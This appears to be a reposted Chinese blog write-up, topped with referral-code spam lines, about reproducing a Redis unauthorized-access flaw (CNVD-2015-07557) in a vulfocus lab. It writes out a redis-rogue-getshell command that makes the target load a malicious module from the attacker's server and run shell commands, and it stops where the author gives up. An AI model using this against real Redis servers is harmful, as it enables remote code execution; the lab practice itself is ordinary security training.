柚子快報邀請碼778899分享:redis cnvd
柚子快報邀請碼778899分享:redis cnvd
1.復現環(huán)境與工具
環(huán)境是在vulfocus上面
工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module
參考攻擊使用方式與原理:https://vulhub.org/#/environments/redis/4-unacc/
2.復現
需要一個外網的服務器做,上傳這個工具到服務器上進入這個文件夾里面后輸入命令: python3 redis-master.py -r 目的ip -p 目的端口 -L 你的ip -P 你開放的端口?-f RedisModulesSDK/exp.so -c "id"
出了一個file,搜了一下是由于這個文件用python3寫的,要檢查一下你的服務器上是不是python版本3.0以上,用where python查python的安裝位置 ls -l 目錄/py* 得到代python的所有文件,看有沒有python3 ,他的命令是什么 參考:Linux系統(tǒng)安裝Python3環(huán)境(超詳細)-騰訊云開發(fā)者社區(qū)-騰訊云
我這里是裝了的,名稱為python3
這個要先根據他github上面的內容去做make之后再運行 python3 redis-master.py -r 目的ip -p 目的端口 -L 攻擊者ip -P 對應端口 -f RedisModulesSDK/exp.so -c "id"redis-cli -h 123.58.224.8 -p 45635 用redis組件去連接上這個redis,之后按照我的理解來說應該是用redis寫入公鑰連接才對:
參考redis未授權訪問-cnvd 2015-0755漏洞復現 - FreeBuf網絡安全行業(yè)門戶
但是去試的時候發(fā)現
好像是環(huán)境有點問題,沒權限了 所以需要用寫入web的方法去做,要換工具做 要是還是想得到flag的話就參考
未授權漏洞vulfocu靶場實戰(zhàn)_vulfocus中redis未授權漏洞如何拿到falg-CSDN博客
vulfocus靶場redis 未授權訪問漏洞之CNVD-2015-07557-CSDN博客
我太懶了,實在不想重新來過了
柚子快報邀請碼778899分享:redis cnvd
文章來源
本文內容根據網絡資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。
轉載請注明,如有侵權,聯系刪除。